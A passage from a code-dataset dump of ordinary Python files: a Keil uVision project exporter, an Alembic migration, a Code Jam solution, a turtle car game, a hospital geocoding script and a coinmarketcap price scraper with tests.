mapping to uvision uvproj dics\n # for available flags, check armcc/armasm/armlink command line guide\n # this does not provide all options within a project, most usable options are\n # exposed via command line, the rest is covered via template project files\n FLAGS_TO_UVISION = {\n 'asm_flags': 'Aads',\n 'c_flags': 'Cads',\n 'cxx_flags': 'Cads',\n 'ld_flags': 'LDads',\n }\n\n ERRORLEVEL = {\n 0: 'success (0 warnings, 0 errors)',\n 1: 'warnings',\n 2: 'errors',\n 3: 'fatal errors',\n 11: 'cant write to project file',\n 12: 'device error',\n 13: 'error writing',\n 15: 'error reading xml file',\n }\n\n SUCCESSVALUE = 0\n WARNVALUE = 1\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvproj': '',\n }\n }\n\n def use_armclang(self):\n return False\n\n def __init__(self, workspace, env_settings):\n self.definitions = uVisionDefinitions()\n # workspace or project\n self.workspace = workspace\n self.env_settings = env_settings\n self.uvproj_file = join(self.TEMPLATE_DIR, \"uvision.uvproj\")\n self.uvmpw_file = join(self.TEMPLATE_DIR, \"uvision.uvmpw\")\n self.uvoptx_file = join(self.TEMPLATE_DIR, \"uvision.uvoptx\")\n\n @staticmethod\n def get_toolnames():\n return ['uvision']\n\n @staticmethod\n def get_toolchain():\n return 'uvision'\n\n def _expand_one_file(self, source, new_data, extension):\n ordered = OrderedDict()\n ordered[\"FileType\"] = self.file_types[extension]\n ordered[\"FileName\"] = basename(source)\n ordered[\"FilePath\"] = source\n return ordered\n\n def _normalize_mcu_def(self, mcu_def):\n for k, v in mcu_def['TargetOption'].items():\n mcu_def['TargetOption'][k] = v[0]\n\n def _uvproj_clean_xmldict(self, uvproj_dic):\n for k, v in uvproj_dic.items():\n if v is None:\n uvproj_dic[k] = ''\n\n def _uvproj_set_CommonProperty(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n\n def _uvproj_set_DebugOption(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n self._uvproj_clean_xmldict(uvproj_dic['SimDlls'])\n self._uvproj_clean_xmldict(uvproj_dic['Simulator'])\n self._uvproj_clean_xmldict(uvproj_dic['Target'])\n self._uvproj_clean_xmldict(uvproj_dic['TargetDlls'])\n\n def _uvproj_set_DllOption(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n\n def _uvproj_set_TargetArmAds(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic['Aads'])\n self._uvproj_clean_xmldict(uvproj_dic['Aads']['VariousControls'])\n self._uvproj_clean_xmldict(uvproj_dic['ArmAdsMisc'])\n self._uvproj_clean_xmldict(uvproj_dic['Cads'])\n self._uvproj_clean_xmldict(uvproj_dic['Cads']['VariousControls'])\n self._uvproj_clean_xmldict(uvproj_dic['LDads'])\n uvproj_dic['LDads']['ScatterFile'] = project_dic['linker_file']\n\n uvproj_dic['Cads']['VariousControls']['IncludePath'] = '; '.join(project_dic['include_paths'])\n uvproj_dic['Cads']['VariousControls']['Define'] = ', '.join(project_dic['macros'])\n if project_dic['macros']:\n if self.use_armclang():\n uvproj_dic['Aads']['VariousControls']['MiscControls'] = '-D' + ' -D'.join(project_dic['macros'])\n else:\n uvproj_dic['Aads']['VariousControls']['MiscControls'] = '--cpreproc --cpreproc_opts=-D' + ',-D'.join(project_dic['macros'])\n\n for misc_keys in project_dic['misc'].keys():\n # ld-flags dont follow the same as asm/c flags, why?!? Please KEIL fix this\n if misc_keys == 'ld_flags':\n for item in project_dic['misc'][misc_keys]:\n uvproj_dic[self.FLAGS_TO_UVISION[misc_keys]]['Misc'] += ' ' + item\n else:\n for item in project_dic['misc'][misc_keys]:\n uvproj_dic[self.FLAGS_TO_UVISION[misc_keys]]['VariousControls']['MiscControls'] += ' ' + item\n\n def _uvproj_set_TargetCommonOption(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n self._uvproj_clean_xmldict(uvproj_dic['AfterMake'])\n self._uvproj_clean_xmldict(uvproj_dic['BeforeCompile'])\n self._uvproj_clean_xmldict(uvproj_dic['BeforeMake'])\n self._uvproj_clean_xmldict(uvproj_dic['TargetStatus'])\n uvproj_dic['OutputDirectory'] = project_dic['build_dir']\n uvproj_dic['OutputName'] = project_dic['name']\n uvproj_dic['CreateExecutable'] = 1 if project_dic['output_type'] == 'exe' else 0\n uvproj_dic['CreateLib'] = 1 if project_dic['output_type'] == 'lib' else 0\n\n def _uvproj_set_Utilities(self, uvproj_dic, project_dic):\n self._uvproj_clean_xmldict(uvproj_dic)\n\n def _uvproj_files_set(self, uvproj_dic, project_dic):\n uvproj_dic['Project']['Targets']['Target']['Groups'] = OrderedDict()\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'] = []\n i = 0\n for group_name, files in project_dic['groups'].items():\n # Why OrderedDict() - uvision project requires an order. GroupName must be before Files,\n # otherwise it does not sense any file. Same applies for other attributes, like VariousControl.\n # Therefore be aware that order matters in this exporter\n group = OrderedDict()\n group['GroupName'] = group_name\n # group['Files'] = {}\n group['Files'] = {'File': []}\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'].append(group)\n for file in files:\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'][i]['Files']['File'].append(file)\n files = uvproj_dic['Project']['Targets']['Target']['Groups']['Group'][i]['Files']['File']\n uvproj_dic['Project']['Targets']['Target']['Groups']['Group'][i]['Files']['File'] = sorted(files, key=lambda x: x['FileName'].lower())\n i += 1\n\n def _generate_uvmpw_file(self):\n uvmpw_dic = xmltodict.parse(open(self.uvmpw_file, \"rb\"))\n uvmpw_dic['ProjectWorkspace']['project'] = []\n\n for project in self.workspace['projects']:\n # We check how far is project from root and workspace. IF they dont match,\n # get relpath for project and inject it into workspace\n path_project = os.path.dirname(project['files']['uvproj'])\n path_workspace = os.path.dirname(self.workspace['settings']['path'] + '\\\\')\n destination = os.path.join(os.path.relpath(self.env_settings.root, path_project), project['files']['uvproj'])\n if path_project != path_workspace:\n destination = os.path.join(os.path.relpath(self.env_settings.root, path_workspace), project['files']['uvproj'])\n uvmpw_dic['ProjectWorkspace']['project'].append({'PathAndName': destination})\n\n # generate the file\n uvmpw_xml = xmltodict.unparse(uvmpw_dic, pretty=True)\n project_path, uvmpw = self.gen_file_raw(uvmpw_xml, '%s.uvmpw' % self.workspace['settings']['name'], self.workspace['settings']['path'])\n return project_path, uvmpw\n\n def _set_target(self, expanded_dic, uvproj_dic, tool_name):\n pro_def = ProGenDef(tool_name)\n if not pro_def.is_supported(expanded_dic['target'].lower()):\n raise RuntimeError(\"Target %s is not supported. Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n mcu_def_dic = pro_def.get_tool_definition(expanded_dic['target'].lower())\n if not mcu_def_dic:\n raise RuntimeError(\n \"Target definitions were not found for %s. Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n logger.debug(\"Mcu definitions: %s\" % mcu_def_dic)\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['Device'] = mcu_def_dic['TargetOption']['Device'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['DeviceId'] = mcu_def_dic['TargetOption']['DeviceId'][0]\n try:\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['Vendor'] = mcu_def_dic['TargetOption']['Vendor'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['Cpu'] = mcu_def_dic['TargetOption']['Cpu'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['FlashDriverDll'] = str(mcu_def_dic['TargetOption']['FlashDriverDll'][0])\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['SFDFile'] = mcu_def_dic['TargetOption']['SFDFile'][0]\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['RegisterFile'] = mcu_def_dic['TargetOption']['RegisterFile'][0]\n except KeyError:\n pass\n\n uvproj_dic['Project']['Targets']['Target']['uAC6'] = \"1\" if self.use_armclang() else \"0\"\n\n # overwrite the template if target has defined debugger\n # later progen can overwrite this if debugger is set in project data\n try:\n debugger_name = pro_def.get_debugger(expanded_dic['target'])['name']\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DebugOption']['TargetDlls']['Driver'] = self.definitions.debuggers[debugger_name]['uvproj']['TargetDlls']['Driver']\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['Utilities']['Flash2'] = self.definitions.debuggers[debugger_name]['uvproj']['Utilities']['Flash2']\n except (TypeError, KeyError) as err:\n pass\n # Support new device packs\n if 'PackID' in mcu_def_dic['TargetOption']:\n if 'uvision5' in tool_name:\n # using software packs require v5\n logger.info(\"The target might not be supported in %s, requires uvision5\" % tool_name)\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption']['PackID'] = mcu_def_dic['TargetOption']['PackID'][0]\n\n def _uvoptx_set_debugger(self, expanded_dic, uvoptx_dic, tool_name):\n pro_def = ProGenDef(tool_name)\n if not pro_def.is_supported(expanded_dic['target'].lower()):\n raise RuntimeError(\"Target %s is not supported. Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n mcu_def_dic = pro_def.get_tool_definition(expanded_dic['target'].lower())\n if not mcu_def_dic:\n raise RuntimeError(\n \"Target definitions were not found for %s. Please add them to https://github.com/project-generator/project_generator_definitions\" % expanded_dic['target'].lower())\n logger.debug(\"Mcu definitions: %s\" % mcu_def_dic)\n\n # set the same target name FlashDriverDll config as in uvprojx file\n try:\n uvoptx_dic['ProjectOpt']['Target']['TargetName'] = expanded_dic['name']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['TargetDriverDllRegistry']['SetRegEntry']['Name'] = str(mcu_def_dic['TargetOption']['FlashDriverDll'][0])\n except KeyError:\n return\n\n # load debugger from target dictionary or use default debugger\n try:\n debugger_dic = pro_def.get_debugger(expanded_dic['target'])\n if debugger_dic is None:\n debugger_name = self.definitions.debuggers_default\n else:\n debugger_name = debugger_dic['name']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['DebugOpt']['nTsel'] = self.definitions.debuggers[debugger_name]['uvoptx']['DebugOpt']['nTsel']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['DebugOpt']['pMon'] = self.definitions.debuggers[debugger_name]['uvoptx']['DebugOpt']['pMon']\n uvoptx_dic['ProjectOpt']['Target']['TargetOption']['TargetDriverDllRegistry']['SetRegEntry']['Key'] = self.definitions.debuggers[debugger_name]['uvoptx']['SetRegEntry']['Key']\n except KeyError:\n raise RuntimeError(\"Debugger %s is not supported\" % expanded_dic['debugger'])\n\n def _export_single_project(self, tool_name):\n expanded_dic = self.workspace.copy()\n\n groups = self._get_groups(self.workspace)\n expanded_dic['groups'] = {}\n for group in groups:\n expanded_dic['groups'][group] = []\n\n # get relative path and fix all paths within a project\n self._iterate(self.workspace, expanded_dic)\n\n expanded_dic['build_dir'] = '.\\\\' + expanded_dic['build_dir'] + '\\\\'\n\n # generic tool template specified or project\n if expanded_dic['template']:\n for template in expanded_dic['template']:\n template = join(getcwd(), template)\n if os.path.splitext(template)[1] == '.uvproj' or os.path.splitext(template)[1] == '.uvprojx' or \\\n re.match('.*\\.uvproj.tmpl$', template) or re.match('.*\\.uvprojx.tmpl$', template):\n try:\n uvproj_dic = xmltodict.parse(open(template, encoding=\"utf8\").read())\n except IOError:\n logger.info(\"Template file %s not found\" % template)\n return None, None\n else:\n logger.info(\"Template file %s contains unknown template extension (.uvproj/x are valid). Using default one\" % template)\n uvproj_dic = xmltodict.parse(open(self.uvproj_file, \"rb\"))\n elif 'uvision' in self.env_settings.templates.keys():\n # template overrides what is set in the yaml files\n for template in self.env_settings.templates['uvision']:\n template = join(getcwd(), template)\n if os.path.splitext(template)[1] == '.uvproj' or os.path.splitext(template)[1] == '.uvprojx' or \\\n re.match('.*\\.uvproj.tmpl$', template) or re.match('.*\\.uvprojx.tmpl$', template):\n try:\n uvproj_dic = xmltodict.parse(open(template, encoding=\"utf8\").read())\n except IOError:\n logger.info(\"Template file %s not found. Using default template\" % template)\n uvproj_dic = xmltodict.parse(open(self.uvproj_file, \"rb\"))\n else:\n logger.info(\"Template file %s contains unknown template extension (.uvproj/x are valid). Using default one\" % template)\n uvproj_dic = xmltodict.parse(open(self.uvproj_file))\n else:\n uvproj_dic = xmltodict.parse(open(self.uvproj_file, \"rb\"))\n\n try:\n uvproj_dic['Project']['Targets']['Target']['TargetName'] = expanded_dic['name']\n except KeyError:\n raise RuntimeError(\"The uvision template is not valid .uvproj file\")\n\n self._uvproj_files_set(uvproj_dic, expanded_dic)\n self._uvproj_set_CommonProperty(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['CommonProperty'], expanded_dic)\n self._uvproj_set_DebugOption(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DebugOption'], expanded_dic)\n self._uvproj_set_DllOption(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DllOption'], expanded_dic)\n self._uvproj_set_TargetArmAds(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetArmAds'], expanded_dic)\n self._uvproj_set_TargetCommonOption(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['TargetCommonOption'], expanded_dic)\n self._uvproj_set_Utilities(\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['Utilities'], expanded_dic)\n\n # set target only if defined, otherwise use from template/default one\n if 'uvision5' in tool_name:\n extension = 'uvprojx'\n uvproj_dic['Project']['SchemaVersion'] = '2.1'\n else:\n extension = 'uvproj'\n uvproj_dic['Project']['SchemaVersion'] = '1.1'\n\n if expanded_dic['target']:\n self._set_target(expanded_dic, uvproj_dic, tool_name)\n\n # load debugger\n if expanded_dic['debugger']:\n try:\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['DebugOption']['TargetDlls']['Driver'] = self.definitions.debuggers[expanded_dic['debugger']]['uvproj']['TargetDlls']['Driver']\n uvproj_dic['Project']['Targets']['Target']['TargetOption']['Utilities']['Flash2'] = self.definitions.debuggers[expanded_dic['debugger']]['uvproj']['Utilities']['Flash2']\n except KeyError:\n raise RuntimeError(\"Debugger %s is not supported\" % expanded_dic['debugger'])\n\n # Project file\n uvproj_xml = xmltodict.unparse(uvproj_dic, pretty=True)\n project_path, uvproj = self.gen_file_raw(uvproj_xml, '%s.%s' % (expanded_dic['name'], extension), expanded_dic['output_dir']['path'])\n\n uvoptx = None\n\n # generic tool template specified\n uvoptx_dic = xmltodict.parse(open(self.uvoptx_file, \"rb\"))\n\n self._uvoptx_set_debugger(expanded_dic, uvoptx_dic, tool_name)\n\n # set target only if defined, otherwise use from template/default one\n if 'uvision5' in tool_name:\n extension = 'uvoptx'\n else:\n extension = 'uvopt'\n\n # Project file\n uvoptx_xml = xmltodict.unparse(uvoptx_dic, pretty=True)\n project_path, uvoptx = self.gen_file_raw(uvoptx_xml, '%s.%s' % (expanded_dic['name'], extension), expanded_dic['output_dir']['path'])\n\n return project_path, [uvproj, uvoptx]\n\n def export_workspace(self):\n path, workspace = self._generate_uvmpw_file()\n return path, [workspace]\n\n def export_project(self):\n path, files = self._export_single_project('uvision') #todo: uvision will switch to uv4\n generated_projects = copy.deepcopy(self.generated_project)\n generated_projects['path'] = path\n generated_projects['files']['uvproj'] = files[0]\n return generated_projects\n\n def get_generated_project_files(self):\n return {'path': self.workspace['path'], 'files': [self.workspace['files']['uvproj']]}\n\n def _build_project(self, tool_name, extension):\n # > UV4 -b [project_path]\n path = join(self.env_settings.root, self.workspace['files'][extension])\n if path.split('.')[-1] != extension:\n path = path + extension\n\n if not os.path.exists(path):\n logger.debug(\"The file: %s does not exists, exported prior building?\" % path)\n return -1\n\n logger.debug(\"Building uVision project: %s\" % path)\n\n build_log_path = join(os.path.dirname(path),'build','build_log.txt')\n args = [self.env_settings.get_env_settings(tool_name), '-r', '-j0', '-o', build_log_path, path]\n logger.debug(args)\n\n try:\n ret_code = None\n ret_code = subprocess.call(args)\n except:\n logger.error(\n \"Error whilst calling UV4: '%s'. Please set uvision path in the projects.yaml file.\" % self.env_settings.get_env_settings('uvision'))\n return -1\n else:\n if ret_code != self.SUCCESSVALUE and ret_code != self.WARNVALUE:\n # Seems like something went wrong.\n logger.error(\"Project: %s build failed with the status: %s\" % (self.workspace['files'][extension], self.ERRORLEVEL.get(ret_code, \"Unknown\")))\n return -1\n else:\n logger.info(\"Project: %s build succeeded with the status: %s\" % (self.workspace['files'][extension], self.ERRORLEVEL.get(ret_code, \"Unknown\")))\n return 0\n\n def build_project(self, **kwargs):\n return self._build_project('uvision', 'uvproj')\n\nclass Uvision5(Uvision):\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvprojx': '',\n 'uvoptx': '',\n }\n }\n\n def __init__(self, workspace, env_settings):\n super(Uvision5, self).__init__(workspace, env_settings)\n\n @staticmethod\n def get_toolnames():\n return ['uvision5']\n\n def export_project(self):\n path, files = self._export_single_project('uvision5')\n generated_projects = copy.deepcopy(self.generated_project)\n generated_projects['path'] = path\n generated_projects['files']['uvprojx'] = files[0]\n generated_projects['files']['uvoptx'] = files[1]\n return generated_projects\n\n def get_generated_project_files(self):\n return {'path': self.workspace['path'], 'files': [self.workspace['files']['uvprojx'], self.workspace['files']['uvoptx']]}\n\n def build_project(self, **kwargs):\n # tool_name uvision as uv4 is still used in uv5\n return self._build_project('uvision', 'uvprojx')\n\n\nclass UvisionArmC6(Uvision):\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvprojx': '',\n 'uvoptx': '',\n }\n }\n\n def use_armclang(self):\n return True\n\n def __init__(self, workspace, env_settings):\n super(UvisionArmC6, self).__init__(workspace, env_settings)\n\n @staticmethod\n def get_toolnames():\n return ['uvision_armc6']\n\n @staticmethod\n def get_toolchain():\n return 'uvision_armc6'\n\nclass Uvision5ArmC6(Uvision5):\n\n generated_project = {\n 'path': '',\n 'files': {\n 'uvprojx': '',\n 'uvoptx': '',\n }\n }\n\n def use_armclang(self):\n return True\n\n def __init__(self, workspace, env_settings):\n super(Uvision5ArmC6, self).__init__(workspace, env_settings)\n\n @staticmethod\n def get_toolnames():\n return ['uvision5_armc6']\n\n @staticmethod\n def get_toolchain():\n return 'uvision_armc6'\n","repo_name":"project-generator/project_generator","sub_path":"project_generator/tools/uvision.py","file_name":"uvision.py","file_ext":"py","file_size_in_byte":26147,"program_lang":"python","lang":"en","doc_type":"code","stars":241,"dataset":"github-code","pt":"61"} +{"seq_id":"24021513286","text":"\"\"\"empty message\n\nRevision ID: 0c1e847a182e\nRevises: e800d9440b54\nCreate Date: 2023-05-25 17:17:05.962086\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '0c1e847a182e'\ndown_revision = 'e800d9440b54'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('payment', schema=None) as batch_op:\n batch_op.add_column(sa.Column('option', sa.String(length=200), nullable=True))\n\n with op.batch_alter_table('subscription', schema=None) as batch_op:\n batch_op.drop_column('option')\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('subscription', schema=None) as batch_op:\n batch_op.add_column(sa.Column('option', mysql.VARCHAR(charset='utf8mb4', collation='utf8mb4_general_ci', length=200), nullable=True))\n\n with op.batch_alter_table('payment', schema=None) as batch_op:\n batch_op.drop_column('option')\n\n # ### end Alembic commands ###\n","repo_name":"Shaykhattarov/crm-domofon-flask","sub_path":"migrations/versions/0c1e847a182e_.py","file_name":"0c1e847a182e_.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23401363441","text":"import sys\r\nimport os\r\nimport math\r\nimport Tkinter\r\n\r\ndef main():\r\n from tkFileDialog import askopenfilename\r\n root=Tkinter.Tk()\r\n root.withdraw()\r\n nameIn = askopenfilename(title=\"Bullseye\",filetypes=[(\"text\",\"*.txt\"),(\"all files\",\"*\")])\r\n file = open(nameIn,\"r\")\r\n T=file.readline()\r\n ofile = open(\"output.txt\",\"w\")\r\n \r\n for i in range(0,int(T)):\r\n row=file.readline().rsplit()\r\n r=int(row[0])\r\n t=int(row[1])\r\n number = paint(r,t)\r\n ofile.write(\"Case #\"+str(i+1)+': '+number+'\\n')\r\n\r\ndef paint(r,t):\r\n rp=t\r\n count=0\r\n while (2*r+1)<=rp:\r\n count+=1\r\n rp-=2*r+1\r\n r+=2\r\n return str(count)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_120/716.py","file_name":"716.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5797930747","text":"import random\nfrom turtle import Turtle, Screen\nscreen = Screen()\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n self.STARTING_MOVE_DISTANCE = 5\n self.MOVE_INCREMENT = 5\n\n def create_car(self):\n random_chance = random.randint(0, 6)\n if random_chance == 1:\n screen.tracer(0)\n new_car = Turtle()\n color = random.choice(COLORS)\n new_car.shape(\"square\")\n new_car.color(color)\n new_car.penup()\n new_car.turtlesize(stretch_wid=1.1, stretch_len=3)\n new_car.setheading(180)\n new_y = random.randrange(-300, 300)\n new_car.goto(320, new_y)\n screen.update()\n self.cars.append(new_car)\n\n def move_car(self):\n for car in self.cars:\n car.forward(self.STARTING_MOVE_DISTANCE)\n\n def update_car_speed(self):\n self.STARTING_MOVE_DISTANCE += self.MOVE_INCREMENT\n","repo_name":"AjaySharma2003/100-Days-of-Code-The-Complete-Python-Pro-Bootcamp","sub_path":"Day_23_Turtle_Trafic/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29926429191","text":"from geopy.geocoders import GoogleV3\nimport geopy\nimport csv\nimport time\n\nAPI_KEY = \"\"\n\nINPUT_FILE = \"hospital_info.csv\"\nOUTPUT_FILE = \"coordinates.csv\"\n\nhospital_name_column = \"providerName\"\n\ndef main():\n with open(INPUT_FILE, \"r\") as incsv, open(OUTPUT_FILE, \"w\") as outcsv:\n reader = csv.reader(incsv)\n writer = csv.writer(outcsv)\n\n writer.writerow([\"providerName\",\"latitude\",\"longitude\"])\n\n skip_header = True\n missing_coords = []\n\n\n for row in reader:\n #Skip header\n if skip_header:\n skip_header = False\n continue\n\n #Get hospital data\n hospital_name = row[1]\n hospital_street = row[2]\n hospital_city = row[3]\n hospital_postcode = row[5]\n print(hospital_name)\n try:\n #print(\"Attempting {}\".format(hospital_name))\n location = GoogleV3(api_key=API_KEY, timeout=10).geocode(\"{} {} {}\".format(hospital_name,hospital_street,hospital_postcode))\n writer.writerow([hospital_name,location.latitude,location.longitude])\n print(\"OK\\n\")\n except AttributeError:\n print(\"MISSING\\n\")\n missing_coords.append(hospital_name)\n #time.sleep(1)\n outcsv.close()\n print(\"Missing coords for:\")\n for hosp in missing_coords:\n print(\"\\t {}\".format(hosp))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dtatkinson/indus","sub_path":"BigVinnysBigScripts/geocoding.py","file_name":"geocoding.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41108724162","text":"\"\"\" Module for requesting data from coinmarketcap.org and parsing it. \"\"\"\nimport codecs\nfrom datetime import datetime\nfrom datetime import time\nfrom decimal import Decimal\nimport json\nimport logging\nimport lxml.html\nimport requests\nimport os\nfrom random import random\nimport sys\nimport time\nimport unittest\n\nbaseUrl = \"http://coinmarketcap.com\"\ncountRequested = 0\ninterReqTime = 1\nlastReqTime = None\n\n\ndef _request(payloadString):\n \"\"\"Private method for requesting an arbitrary query string.\"\"\"\n global countRequested\n global lastReqTime\n if lastReqTime is not None and time.time() - lastReqTime < interReqTime:\n timeToSleep = random()*(interReqTime-time.time()+lastReqTime)*2\n logging.info(\"Sleeping for {0} seconds before request.\".format(\n timeToSleep))\n time.sleep(timeToSleep)\n logging.info(\"Issuing request for the following payload: {0}\".format(\n payloadString))\n r = requests.get(\"{0}/{1}\".format(baseUrl, payloadString))\n lastReqTime = time.time()\n countRequested += 1\n if r.status_code == requests.codes.ok:\n return r.text\n else:\n raise Exception(\"Could not process request. \\\n Received status code {0}.\".format(r.status_code))\n\n\ndef requestCurrencyList(view):\n \"\"\"Request a currency list.\"\"\"\n \"\"\"CAVEAT: Parse is currently built for only the 'all' view.\"\"\"\n return _request(\"currencies/views/{0}/\".format(view))\n\n\ndef requestCurrency(currencySlug):\n \"\"\"Request the page for a specific currency.\"\"\"\n \"\"\"CAVEAT: There is currently no corresponding parser for this data.\"\"\"\n return _request(\"currencies/{0}/\".format(currencySlug))\n\n\ndef requestMarketCap(currencySlug, numDays):\n \"\"\"Request market cap data for a given currency slug.\"\"\"\n return _request(\n \"static/generated_pages/currencies/datapoints/{0}-{1}d.json\".format(\n currencySlug, numDays))\n\n\ndef parseCurrencyListAll(html):\n \"\"\"Parse the information returned by requestCurrencyList for view 'all'.\"\"\"\n data = []\n\n docRoot = lxml.html.fromstring(html)\n currencyRows = docRoot.cssselect(\n \"table#currencies-all > tbody > tr\")\n\n for currencyRow in currencyRows:\n datum = {}\n currencyFields = currencyRow.cssselect(\"td\")\n\n # Name and slug\n nameField = currencyFields[1].cssselect(\"a\")[0]\n datum['name'] = nameField.text_content().strip()\n datum['slug'] = nameField.attrib['href'].replace(\n '/currencies/', '').replace('/', '').strip()\n\n # Symbol\n datum['symbol'] = currencyFields[2].text_content().strip()\n\n # Explorer link\n supplyFieldPossible = currencyFields[5].cssselect(\"a\")\n if len(supplyFieldPossible) > 0:\n datum['explorer_link'] = supplyFieldPossible[0].attrib['href']\n else:\n datum['explorer_link'] = ''\n\n data.append(datum)\n\n return data\n\n\ndef parseMarketCap(jsonDump, currency, includeVolume=False):\n \"\"\"Parse the supply and price information returned by requestMarketCap.\"\"\"\n data = []\n rawData = json.loads(jsonDump)\n\n # Covert data in document to wide format\n dataIntermediate = {}\n targetFields = [str(key.replace('_data', '')) for key in rawData.keys()]\n targetFields.remove('x_min')\n targetFields.remove('x_max')\n targetFields.remove('volume')\n for field, fieldData in rawData.iteritems():\n if field == 'x_min' or field == 'x_max' or field == 'volume_data':\n continue\n targetField = str(field.replace('_data', ''))\n for row in fieldData:\n time = int(row[0]/1000)\n if time not in dataIntermediate:\n dataIntermediate[time] = dict(zip(\n targetFields, [None]*len(targetFields)))\n dataIntermediate[time][targetField] = row[1]\n\n # Generate derived data & alter format\n times = sorted(dataIntermediate.keys())\n for time in times:\n datum = dataIntermediate[time]\n datum['currency'] = currency\n datum['time'] = datetime.utcfromtimestamp(time)\n\n if (datum['market_cap_by_available_supply'] is not None and\n datum['price_usd'] is not None):\n datum['est_available_supply'] = float(\n datum['market_cap_by_available_supply'] / datum['price_usd'])\n else:\n datum['est_available_supply'] = None\n\n if (datum['market_cap_by_total_supply'] is not None and\n datum['price_usd'] is not None):\n datum['est_total_supply'] = float(\n datum['market_cap_by_total_supply'] / datum['price_usd'])\n else:\n datum['est_available_supply'] = None\n\n data.append(datum)\n\n # Section for handling volume data if specified (has different time scale!)\n if not includeVolume:\n return data\n else:\n volData = []\n volDataRaw = sorted(\n rawData['volume_data'], key=lambda x: x[0])\n for vdr in volDataRaw:\n datum = {}\n datum['currency'] = currency\n datum['time'] = datetime.utcfromtimestamp(int(vdr[0]/1000))\n datum['volume'] = vdr[1]\n volData.append(datum)\n return data, volData\n\n\nclass CoinmarketcapTest(unittest.TestCase):\n\n \"\"\"\"Testing suite for coinmarketcap module.\"\"\"\n\n def testRequestCurrencyList(self):\n \"\"\"Test requestCurrencyList.\"\"\"\n html = requestCurrencyList(\"all\")\n f = codecs.open(\"{0}/data/test_currencylist.html\".format(\n os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')\n f.write(html)\n f.close()\n docRoot = lxml.html.fromstring(html)\n currencyRows = docRoot.cssselect(\n \"table#currencies-all > tbody > tr\")\n self.assertEqual(len(currencyRows) > 101, True)\n\n def testRequestCurrency(self):\n \"\"\"Test requestCurrency.\"\"\"\n html = requestCurrency(\"navajo\")\n f = codecs.open(\"{0}/data/test_currency_navajo.html\".format(\n os.path.dirname(os.path.abspath(__file__))), 'w', 'utf-8')\n f.write(html)\n f.close()\n docRoot = lxml.html.fromstring(html)\n currency = docRoot.cssselect(\n \"div.container > div > div > h1.text-large\"\n )[0].text_content().strip()\n self.assertEqual(currency, \"Navajo (NAV)\")\n\n def testRequestMarketCap(self):\n \"\"\"Test requestMarketCap.\"\"\"\n jsonDump = requestMarketCap(\"navajo\", 7)\n f = open(\"{0}/data/test_marketcap_navajo_7d.json\".format(\n os.path.dirname(os.path.abspath(__file__))), 'w')\n f.write(jsonDump)\n f.close()\n data = json.loads(jsonDump)\n headingsExpected = set([\n \"market_cap_by_available_supply_data\",\n \"market_cap_by_total_supply_data\",\n \"price_btc_data\",\n \"price_usd_data\",\n \"volume_data\",\n \"x_max\",\n \"x_min\"\n ])\n self.assertEqual(set(data.keys()), headingsExpected)\n\n def testParseCurrencyListAll(self):\n \"\"\"Test parseCurrencyListAll.\"\"\"\n f = codecs.open(\"{0}/example/currencylist.html\".format(\n os.path.dirname(os.path.abspath(__file__))), 'r', 